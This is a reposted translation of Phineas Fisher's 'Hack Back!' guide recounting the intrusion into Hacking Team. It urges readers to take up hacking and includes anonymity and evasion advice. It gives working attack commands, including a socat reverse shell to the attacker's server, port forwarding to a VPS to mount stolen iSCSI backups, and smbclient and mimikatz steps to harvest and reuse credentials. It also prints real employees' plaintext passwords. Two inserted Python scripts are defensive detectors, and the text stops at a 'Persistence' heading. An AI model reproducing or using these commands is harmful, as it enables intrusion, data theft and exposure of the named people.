This is by no means my own content; I found it on pastebin and kept it. I also made some changes to the formatting, but tried to keep as much of the beautiful original text-file zine feel as possible. I hope you enjoy it and learn a great deal about security and Linux. If you are a beginner at Linux, read it, and if you have any questions feel free to leave a question in the comments and I will try to answer.

[ASCII-art banner: "Hack Back!" -- A DIY Guide -- #antisec]

UPDATE: the original author, Phineas Fisher, has released his own translation, making this quick draft more or less obsolete. You can find his version here:

http://pastebin.com/raw/0SNSvyjJ

0xdeba5e12

1 - Introduction:

Note the change in language since the last issue [1]. The English-speaking world already has books, talks, guides, and all sorts of information about hacking. There are a lot of hackers in that world who are better than I am, but who disgracefully fritter away their knowledge working as "defence" contractors, for intelligence agencies, protecting banks and corporations and defending the established order. Hacker culture in the US originated as a counterculture, but all that's left of that origin is the aesthetic -- everything else has been assimilated. At least they get to wear a T-shirt, dye their hair blue, use hacker handles, and feel like rebels while they work for the system.

There was once a time when you had to break into an office building to exfiltrate documents [2]. You used to need a gun to rob a bank. These days you can do it all from bed with a laptop in your hands [3][4]. Like the CNT once said about the Gamma Group hack: "we should move forward with these new forms of struggle" [5]. Hacking is a powerful tool. Learn it and join the fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI

[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html

[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf

[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

2 - Hacking Team:

Hacking Team was a company that helped governments to hack and spy on journalists, activists, the political opposition, and other threats to their power [1][2][3][4][5][6][7][8][9][10][11] -- as well as, every now and then, criminals and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the fascist slogan "boia chi molla". He was, more precisely, a "boia chi vende RCS". All the while, he claimed to have the technology to solve the "Tor problem" and the "darknet problem" [13]. But since I've been able to maintain my freedom, I have my doubts about how effective that technology is.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/

[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html

[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/

[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/

[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/

[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/

[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/

[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal

[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/

[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/

[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/

[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html

[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

3 - Be careful out there:

Sadly, our world is upside-down. You get richer by doing bad things, and get locked up for doing good things. Fortunately, thanks to the hard work of people like those in the "Tor Project" [1], you can avoid getting yourself locked up by following a few simple guidelines:

- Encrypt your hard drive [2]: I assume that by the time the police come to impound your computer, you've already made many mistakes, but an ounce of prevention is worth a pound of cure.

- Use a virtual machine and route all your traffic through Tor: This achieves two things. First, all of your connections are anonymized through the Tor network. Second, keeping your personal life and your anonymous life on different computers helps you avoid mixing them up by accident. You can protect yourself with Whonix [3], Tails [4], Qubes TorVM [5], or something personalized [6]. You can find a detailed comparison here [7].

- (Optional) Don't connect to the Tor network directly: Tor is not a panacea. It's possible to correlate the times at which you connected to Tor with the times during which your hacker handle is active. There have also been attacks using the Tor exit node [8]. You can connect to the network using other people's wifi. Wifislax [9] is a Linux distro with many tools for procuring wifi. Another option is to connect to a VPN or a bridge node [10] before connecting to Tor, but this is less secure because it is possible to correlate the hacker's activity with the internet activity coming from your house (this was used as evidence against Jeremy Hammond, for example [11]).

The reality is that while Tor is not perfect, it works well enough. When I was young and reckless, I did a lot of things without any protection (I'm talking about hacking, here) apart from Tor, which the police were still incapable of investigating, and I never had any problems.

[1] https://www.torproject.org/

[2] https://info.securityinabox.org/es/chapter-4

[3] https://www.whonix.org/

[4] https://tails.boum.org/

[5] https://www.qubes-os.org/doc/privacy/torvm/

[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy

[7] https://www.whonix.org/wiki/Comparison_with_Others

[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/

[9] http://www.wifislax.com/

[10] https://www.torproject.org/docs/bridges.html.en

[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

3.1 - Infrastructure:

I don't hack directly from the Tor exit nodes. They're on blacklists, go very slowly, and cannot receive reverse connections. Tor serves to protect my anonymity while I connect to the infrastructure I use for hacking, which consists of:

- Domain names: to give directions to command and control (C&C), and for setting up DNS tunnels for secure exfiltration.

- Stable servers: to serve as C&C servers for receiving reverse shells, as a place to launch attacks from, and a place to stash the loot.

- Hacked servers: these serve as pivots behind which I hide the IP addresses of the stable servers, and for when I want a quick connection without a pivot -- for portscanning, for example, or scanning the entire internet, or downloading a database through SQL injection, etc.

Obviously you have to pay anonymously, with bitcoin, for example (if you use it carefully).

3.2 - Accountability:

In the news we often see attacks attributed to groups of governmental hackers ('APTs'), because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails, etc.). They're negligent because they are free to hack without any legal consequences.

I didn't want to make it too easy for the police to link what I did to Hacking Team, with its hacks and handles, with my day-to-day work as a blackhat hacker. So I used new servers and domains, registered with new email accounts, and paid with new bitcoin. And I only used tools which were either publicly available, or which I had written specifically for this attack, and I changed my style of doing things so as to not leave my usual forensic footprint.

4 - Gathering information:

Though it might be tedious, this step is very important, since the larger the attack surface, the easier it will be to find a weakness in it, somewhere.

4.1 - Technical Information:

Some of the tools and techniques include:

- Google: You can find a lot of unexpected things with a couple of well-chosen search queries. The identity of DPR, for example [1]. The bible on how to use Google for hacking is the book "Google Hacking for Penetration Testers" [2].

- Enumeration of subdomains: A business's main domain is usually supplied by a third party, and you're going to find a range of IP addresses belonging to subdomains like mx.company.com, ns1.company.com, etc. And sometimes there are things in 'hidden' subdomains that should not be exposed. Tools useful for discovering domains and subdomains include fierce [3], theHarvester [4], and recon-ng [5].

- Whois queries and inverse queries: With an inverse query using a domain's whois information or a business's IP range, you can find other domains and IP ranges belonging to them. As far as I know, there's no free way of making inverse whois queries, except for a Google 'hack':

      "via della moscova 13" site:www.findip-address.com
      "via della moscova 13" site:domaintools.com

- Portscanning and fingerprinting: Apart from the other techniques, you can talk to the business's employees. I include it in this section because it isn't an attack, just a means of obtaining information. The business's IDS might generate an alert upon detecting a portscan, but you don't have to worry about that. The entire internet is scanning itself constantly. For scanning, nmap [6] is precise, and can fingerprint most of the services it discovers. For businesses with large IP ranges, zmap [7] or masscan [8] are fast. WhatWeb [9] and BlindElephant [10] can fingerprint websites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html

[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf

[3] http://ha.ckers.org/fierce/

[4] https://github.com/laramies/theHarvester

[5] https://bitbucket.org/LaNMaSteR53/recon-ng

[6] https://nmap.org/

[7] https://zmap.io/

[8] https://github.com/robertdavidgraham/masscan

[9] http://www.morningstarsecurity.com/research/whatweb

[10] http://blindelephant.sourceforge.net/

4.2 - Social information:

For social engineering, it's very useful to gather information about the employees, their roles, contact information, operating system, browser, plugins, software, etc. Some resources include:

- Google: Here's the most useful tool, again.

- theHarvester and recon-ng: I've mentioned these already in the last section, but they have much more functionality. You can find a lot of information quickly and automatically. It's worth the trouble to read all the documentation.

- LinkedIn: You can find a lot of information about the employees here. The businesses' recruiters will be the ones most inclined to talk.

- Data.com: Previously known as jigsaw. They have contact information for many employees.

- File metadata: You can find a lot of information about employees and their systems in the metadata of files that the business has published. Some handy tools for finding files on a business's website and extracting metadata are metagoofil [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil

[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

5 - Entering the Network:

There are various ways to make an entrance. Since the method used for Hacking Team is less common and more trouble than is ordinarily necessary, I'm going to talk a bit about more common methods, which I recommend attempting first.

5.1 - Social engineering:

Social engineering, and specifically spear phishing, is responsible for the majority of hacks these days. For an introduction in Spanish, see [1]. For more information in English, see [2] (the third part, "Targeted Attacks"). For entertaining anecdotes about social engineering in the past, see [3]. I didn't want to try spear phishing against Hacking Team, since their business is in helping governments spear phish their opposition. There was therefore a much greater risk of Hacking Team recognizing and investigating said attempts.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html

[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/

[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

5.2 - Buying access:

Thanks to the hardworking Russians and their exploit kits, traffic traffickers, and bot farms, many businesses already have compromised machines in their network. Almost all of the Fortune 500, with their enormous networks, have a few bots on the inside. That said, Hacking Team is a very small business, most of whose employees are experts in information security, and so there was very little probability that they had already been compromised.

5.3 - Technical exploitation:

After the Gamma Group hack, I discovered a process for searching for vulnerabilities [1]. Hacking Team has the public IP range:

    inetnum:   93.62.139.32 - 93.62.139.47
    descr:     HT public subnet

Hacking Team had a small exposure to the internet. For example, unlike the Gamma Group, their public-facing site required the client to have a certificate in order to connect. It contained a main website (a Joomla blog, for which Joomscan [2] revealed no serious vulnerabilities), a mail server, a couple of routers, two VPN systems, and a spam-filtering system. And so I had three options: to try to find a 0day in Joomla, a 0day in postfix, or a 0day in one of the embedded systems. A 0day in an embedded system seemed to me to be the most tenable option, and after about two weeks of reverse engineering, I discovered a remote root exploit. Since the vulnerabilities it relies on haven't yet been patched, I'm not going to give any more details on it. For more information on how to search for this type of vulnerability, see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] http://sourceforge.net/projects/joomscan/

[3] http://www.devttys0.com/

[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

6 - Be prepared:

I did a lot of work and testing before using the exploit against Hacking Team. I wrote a firmware with a backdoor, and compiled various post-exploitation tools for the embedded system. The backdoor served to protect the exploit. Using the exploit just once and then returning through the backdoor made the work of discovering and patching the vulnerabilities more difficult.

The post-exploitation tools I had prepared were:

- busybox [1]: for all the common Unix utilities that the system didn't have.

- nmap [2]: for scanning and fingerprinting Hacking Team's internal network.

- Responder.py [3]: the most useful tool for attacking Windows when you have access to the internal network but don't have a user account.

- Python [4]: for executing Responder.py.

- tcpdump [5]: for sniffing traffic.

- dsniff [6]: for snooping passwords from vulnerable protocols like ftp, and for arpspoofing. I'd rather have used ettercap, written by Hacking Team's own ALoR and NaGA, but it was difficult to compile for the system.

- socat [7]: for a handy pty shell:

  On my_server:

      $ socat file:`tty`,raw,echo=0 tcp-listen:my_port

  On the hacked_system:

      $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:my_server:my_port

  And for many other things. It's a network swiss army knife. See the examples section of its documentation.

- screen [8]: like socat's pty, not strictly necessary, but I wanted to feel at home in Hacking Team's network.

- a SOCKS proxy server [9]: to use together with proxychains for accessing the internal network with this or that other programme.

- tgcd [10]: for forwarding ports, like those of the SOCKS server, through the firewall.

[1] https://www.busybox.net/

[2] https://nmap.org/

[3] https://github.com/SpiderLabs/Responder

[4] https://github.com/bendmorris/static-python

[5] http://www.tcpdump.org/

[6] http://www.monkey.org/~dugsong/dsniff/

[7] http://www.dest-unreach.org/socat/

[8] https://www.gnu.org/software/screen/

[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html

[10] http://tgcd.sourceforge.net/

The worst thing that could happen would be that my backdoor or post-exploit tools would make the system unstable, and force an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploit tools in the networks of other vulnerable businesses before entering Hacking Team's network.

7 - Watch and listen:

Now that I was inside the internal network, I wanted to take a look around and think about my next step. I switched Responder.py to analysis mode (-A, to listen without sending poisoned responses), and performed a slow scan with nmap.

8 - NoSQL databases:

NoSQL, or rather NoAuthentication, has been a great gift to the hacker community [1]. Just when I was worrying that all MySQL's sins of omission had finally been patched [2][3][4][5], these new databases appear, lacking authentication by design. Nmap found a few in Hacking Team's internal network:

    27017/tcp open  mongodb MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 47547
    |   totalSize = 49856643072
    ...
    |_  version = 2.6.5

    27017/tcp open  mongodb MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 31987
    |   totalSize = 33540800512
    |   databases
    ...
    |_  version = 2.6.5

These were databases for RCS test instances. The audio that RCS captures is held in a MongoDB with GridFS. This is where the audio folder in the torrent [6] came from. They had inadvertently spied on themselves.

[1] https://www.shodan.io/search?query=product%3Amongodb

[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html

[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c

[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html

[6] https://ht.transparencytoolkit.org/audio/

9 - Crossed wires:

As fun as it was to listen to captures and watch webcam images of Hacking Team developing its malware, it wasn't very useful. Their insecure backups were the vulnerability that threw the doors open. According to the documentation [1], their iSCSI systems should have been on a separate network, but nmap found a few of them in their 192.168.1.200/24 subnet:

    ...
    3260/tcp open  iscsi?
    | iscsi-info:
    |   Target: iqn.2000-01.com.synology:ht-synology.name
    |     Address: 192.168.200.66:3260,0
    |_    Authentication: No authentication required

    Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
    ...
    3260/tcp open  iscsi?
    | iscsi-info:
    |   Target: iqn.2000-01.com.synology:synology-backup.name
    |     Address: 10.0.1.72:3260,0
    |     Address: 192.168.200.72:3260,0
    |_    Authentication: No authentication required
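The mongodb-databases output in section 8 and the iscsi-info output above are exactly what an internal audit of one's own network should be looking for. The following is an added example, not code from the original zine: a Python script that walks nmap normal-output text (a constructed sample with made-up hosts is embedded) and reports every MongoDB instance that listed its databases without credentials (the script's listDatabases call came back with ok = 1) and every iSCSI target that reports "No authentication required". The ok = 0 / errmsg form used for the authenticated host is my assumption about how a refused listing is printed.

```python
import re
from dataclasses import dataclass

# Constructed nmap normal-output text (made-up hosts, addresses and sizes)
# mimicking the mongodb-databases and iscsi-info script output in the zine.
# The third host is the assumed "auth enforced" case: listDatabases fails,
# so the script prints ok = 0 and an errmsg instead of the database list.
SAMPLE_NMAP = """\
Nmap scan report for db-test.example.internal (10.10.0.5)
PORT      STATE SERVICE VERSION
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 1234
|   totalSize = 1293942784
|   databases
|_  version = 2.6.5

Nmap scan report for nas-backup.example.internal (10.10.0.72)
PORT     STATE SERVICE VERSION
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-backup.name
|     Address: 10.10.0.72:3260,0
|_    Authentication: No authentication required

Nmap scan report for db-prod.example.internal (10.10.0.9)
PORT      STATE SERVICE VERSION
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 0
|_  errmsg = not authorized on admin to execute command
"""


@dataclass(frozen=True)
class Exposure:
    host: str
    port: int
    service: str
    reason: str


HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)")
SCRIPT_RE = re.compile(r"^\|\s+([\w-]+):\s*$")  # "| mongodb-databases:" header line
NO_AUTH_ISCSI = "authentication: no authentication required"


def find_unauthenticated(nmap_text):
    """Return one Exposure per service that answered an NSE script without
    any credentials being supplied (nmap never sends any)."""
    exposures = []
    host = port = service = script = None
    for raw in nmap_text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:                         # new host block resets port/script state
            host, port, service, script = m.group(1), None, None, None
            continue
        m = PORT_RE.match(line)
        if m:                         # new port block resets script state
            port, service, script = int(m.group(1)), m.group(2), None
            continue
        if not line.startswith("|") or host is None or port is None:
            continue                  # headers, blank lines, closed ports
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            continue
        body = line.lstrip("|_ ").strip()   # drop the "|", "|_" tree prefix
        if script == "mongodb-databases" and body == "ok = 1":
            # listDatabases succeeded for an unauthenticated client
            exposures.append(Exposure(host, port, service,
                                      "MongoDB lists databases without authentication"))
        elif script == "iscsi-info" and body.lower() == NO_AUTH_ISCSI:
            exposures.append(Exposure(host, port, service,
                                      "iSCSI target exports LUNs without CHAP"))
    return exposures


if __name__ == "__main__":
    for e in find_unauthenticated(SAMPLE_NMAP):
        print(f"{e.host}:{e.port} ({e.service}) - {e.reason}")
```

Feed it the output of an nmap run with `--script mongodb-databases,iscsi-info` over the storage and database subnets and every hit is a host that needs authentication turned on or needs to move to the isolated network the documentation called for.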

iSCSI requires a kernel module, and it would have been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS:

On the VPS:

    $ tgcd -L -p 3260 -q 42838

On the embedded system:

    $ tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

On the VPS:

    $ iscsiadm -m discovery -t sendtargets -p 127.0.0.1

iSCSI now finds the name iqn.2000-01.com.synology, but has some problems mounting it since it now believes that its address is both 192.168.200.72 and 127.0.0.1.

The way to solve this is:

    # iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

and then:

    # iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...and the file system appears! We mount it:

    # vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seems like the most interesting. It's too big to download, but we can mount it remotely and search for interesting files:

    $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
    $ fdisk -l /dev/loop0
    /dev/loop0p1   2048   1258287103   629142528   7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576

    $ losetup -o 1048576 /dev/loop1 /dev/loop0
    $ mount -o ro /dev/loop1 /mnt/exchange/

and now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 we find the hard drive of the virtual machine, and mount it:

    # vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
    # mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and, finally, we have gotten to the centre of the matryoshka doll and we can see all of the files of the old Exchange server on /mnt/part1.

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

10 - From backups to domain admin:

What interested me most in the backups was trying to find a password or hash that I could use to access the actual server. I used pwdump, cachedump, and lsadump [1] with the registry backups. lsadump found a password for the besadmin service account:

    _SC_BlackBerry MDS Connection Service
    0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
    0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
    0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

I used proxychains [2] with the socks server in the embedded system and smbclient [3] to check the password:

    $ proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! The besadmin password was still valid, and was a local admin. I used my proxy and metasploit's psexec_psh [4] to gain a meterpreter session. I migrated to a 64-bit process, "load kiwi" [5], and "creds_wdigest", and by now had a number of passwords, including the domain admin's:

    HACKINGTEAM  BESAdmin       bes32678!!!
    HACKINGTEAM  Administrator  uu8dd8ndd12!
    HACKINGTEAM  c.pozzi        P4ssword          <---- look! the sysadmin!
    HACKINGTEAM  m.romeo        ioLK/(90
    HACKINGTEAM  l.guerra       [email protected]=.=
    HACKINGTEAM  d.martinez     W4tudul3sp
    HACKINGTEAM  g.russo        GCBr0s0705!
    HACKINGTEAM  a.scarafile    Cd4432996111
    HACKINGTEAM  r.viscardi     Ht2015!
    HACKINGTEAM  a.mino         A!e$$andra
    HACKINGTEAM  m.bettini      Ettore&Bella0314
    HACKINGTEAM  m.luppi        Blackou7
    HACKINGTEAM  s.gallucci     1S9i8m4o!
    HACKINGTEAM  d.milan        set!dob66
    HACKINGTEAM  w.furlan       Blu3.B3rry!
    HACKINGTEAM  d.romualdi     [email protected]#
    HACKINGTEAM  l.invernizzi   L0r3nz0123!
    HACKINGTEAM  e.ciceri       2O2571&2E
    HACKINGTEAM  e.rabe         [email protected]!

[1] https://github.com/Neohapsis/creddump7

[2] http://proxychains.sourceforge.net/

[3] https://www.samba.org/

[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf

[5] https://github.com/gentilkiwi/mimikatz

11 - Downloading the mail:

Now that I had the password of the domain admin, I had access to the email, the heart of the business. Since every password I used raised the risk of being detected, I downloaded the emails before going on to explore them. Powershell makes this easy [1]. Curiously, I found a bug in the way that dates were handled. After obtaining the emails, I waited a couple of weeks before getting the source code and all the rest, returning once in a while to download new emails. The server was Italian, with dates in the format day/month/year. I used:

    -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

with New-MailboxExportRequest to download the new mails (in this case all the mails from June 5th onward). The problem was that it said that the date is invalid if the day is greater than 12 (I imagine that this is because the month is usually put first in the US, and the month can't be greater than 12). It seems that the engineers at Microsoft had only tested their software on their own regional configuration.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

12 - Downloading files:

Now that I was the domain's admin, I started downloading the shared resources using my proxy and smbclient's -Tc option. For example:

    $ proxychains smbclient '//192.168.1.230/FAE DiskStation' \
        -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

This is where the Amministrazione, FAE DiskStation, and FileServer folders in the torrent came from.

13 - Introduction to hacking a Windows domain:

I'd like to take a break from the story of these fuckers [weones culiaos], to share a bit of knowledge about attacking Windows networks.

13.1 - Lateral movement:

I'm going to give a quick review of the techniques used for spreading out inside a Windows network. The techniques for remote execution require a local administrator's password or hash to work. The most common way of obtaining these credentials is to use mimikatz [1], and above all sekurlsa::logonpasswords and sekurlsa::msv, from the machines you already have administrative access to. The techniques for moving around "in situ" also require administrative privileges (except for runas). The most important tools for privilege escalation are PowerUp [2] and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821

[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

Remote navigation:

- psexec: The tried and tested way of navigating Windows networks. You can use psexec [1], winexe [2], metasploit's psexec_psh [3], powershell empire's invoke_psexec [4], or the Windows command "sc" [5]. For the metasploit module, powershell empire, and pth-winexe [6], it's enough to know the hash without knowing the password. This is the most universal way (it works on any computer with port 445 open), but it is also the least cautious. Events of type 7045 "Service Control Manager" will appear in the event log. In my experience, this has never tipped anyone off during a hack, but it's something they might notice afterwards, and it might help the investigators figure out what the hacker was doing.

- WMI: The most cautious method. The WMI service is enabled on all Windows computers, except for servers, where the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (you can find a demo of wmiexec and pth-wmis here [8]), powershell empire's invoke_wmi [9], or the Windows command wmic [5]. Aside from wmic, the rest of these require only the hash.

- PSRemoting [10]: This is disabled by default, and I don't advise enabling new protocols unless you have to. But if the sysadmin has already enabled it, it's very convenient, especially if you use powershell for everything (and yes, you should use powershell for almost everything; this may change [11] with powershell 5 and Windows 10, but right now powershell makes it easy to do everything in RAM, dodge the antivirus, and leave few footprints).

- Programmed tasks: You can execute programmes remotely with at and schtasks [5]. They work in the same situations as psexec, and likewise leave some known footprints [12].

- GPO: If all of those protocols are disabled or blocked by the firewall, once you are the administrator of the domain, you can use GPO to give it a logon script, install an msi, execute a programmed task [13], or, as we will see with the computer of Mauro Romeo (Hacking Team's sysadmin), enable WMI and open the firewall through GPO.
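The 7045 service-installation events mentioned under psexec are the footprint a defender can hunt for after the fact. The following is an added example, not code from the original zine: a small Python triage script that parses constructed System-log records (made-up hosts, service names and payloads, flattened to one key=value line each, a format of my own choosing) and flags service installs whose name or image path matches the psexec-style patterns described in the list above. The three rules, and the "random-looking name" heuristic in particular, are my assumptions rather than documented tool behaviour.

```python
import re
from dataclasses import dataclass, field

# Constructed Windows System-log records, one "Key=value Key=value" line
# each (made-up hosts, names and payloads; not from the page or any real
# host). Event 7045 = Service Control Manager "a service was installed".
# The -enc argument is a placeholder, not a real encoded command.
SAMPLE_EVENTS = [
    r"EventID=7045 Computer=WS01.corp.example ServiceName=PSEXESVC "
    r"ImagePath=%SystemRoot%\PSEXESVC.exe StartType=demand_start",
    r"EventID=7045 Computer=WS02.corp.example ServiceName=KbCaJdIm "
    r"ImagePath=%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden "
    r"-enc QQBBAEEAQQBBAEEA StartType=demand_start",
    r"EventID=7045 Computer=WS03.corp.example ServiceName=Sense "
    r'ImagePath="C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" '
    r"StartType=auto_start",
    r"EventID=7036 Computer=WS03.corp.example ServiceName=Spooler State=running",
]


@dataclass
class Finding:
    computer: str
    service_name: str
    image_path: str
    rules: list = field(default_factory=list)


# Service "binary" that is really a script host started with flags typical
# of a one-liner run as a service, rather than a real service executable.
SCRIPT_HOST_RE = re.compile(
    r"\b(powershell|pwsh|cmd)(\.exe)?\b.*?\s-(enc|encodedcommand|nop|w\s+hidden)\b",
    re.IGNORECASE,
)


def parse_event(line):
    """Turn 'Key=value Key=value' into a dict. Values such as ImagePath
    contain spaces, so split only where the next 'Key=' token begins."""
    fields = {}
    for token in re.split(r"\s+(?=[A-Za-z]+=)", line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def looks_random(name):
    """Heuristic (an assumption): 8-16 letters, no digits, and at least
    three upper/lower case switches, as in generated service names."""
    if not re.fullmatch(r"[A-Za-z]{8,16}", name):
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return switches >= 3


def evaluate(event):
    """Return the names of the rules one event matches (empty if benign
    or not a 7045 service-installation event)."""
    if event.get("EventID") != "7045":
        return []
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")
    rules = []
    if name.upper() == "PSEXESVC":          # Sysinternals psexec default name
        rules.append("psexec_service")
    if SCRIPT_HOST_RE.search(path):
        rules.append("script_host_service")
    if looks_random(name):
        rules.append("random_service_name")
    return rules


def scan(lines):
    """Run every record through the rules and collect the hits."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        rules = evaluate(ev)
        if rules:
            findings.append(Finding(ev.get("Computer", "?"), ev.get("ServiceName", "?"),
                                    ev.get("ImagePath", ""), rules))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.computer}: service {f.service_name!r} -> {', '.join(f.rules)}")
```

A hit on a workstation that normally never installs services is the kind of afterwards-noticeable trace the text describes; correlating it with the 4624 logon from the same source tells the investigator which account was used.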

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx

[2] https://sourceforge.net/projects/winexe/

[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh

[4] http://www.powershellempire.com/?page_id=523

[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/

[6] https://github.com/byt3bl33d3r/pth-toolkit

[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

[8] https://www.trustedsec.com/june-2015/no_psexec_needed/

[9] http://www.powershellempire.com/?page_id=124

[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/

[11] https://adsecurity.org/?p=2277

[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

Navigation 'in situ':

- Impersonating tokens: Once you have administrative access to a computer, you can use other users' tokens to access the domain's resources. Two tools for doing this are incognito [1] and the token::* commands in mimikatz [2].

- MS14-068: You can take advantage of a validation vulnerability in Kerberos to generate a domain administrator ticket [3][4][5].

- Pass the Hash: If you have the hash but the user does not have an active session, you can use sekurlsa::pth [2] to obtain a user ticket.

- Process injection: Any RAT can be injected into another process -- the migrate command in meterpreter and pupy [6], for example, or psinject [7] in powershell empire. You can inject into the process that has the token that you want.

- runas: This sometimes turns out to be very useful because it doesn't require admin privileges. The command is part of Windows, but if you don't have the graphical interface, you can use powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165

[2] https://adsecurity.org/?page_id=1821

[3] https://github.com/bidord/pykek

[4] https://adsecurity.org/?p=676

[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html

[6] https://github.com/n1nj4sec/pupy

[7] http://www.powershellempire.com/?page_id=273

[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

13.2 - Persistence:

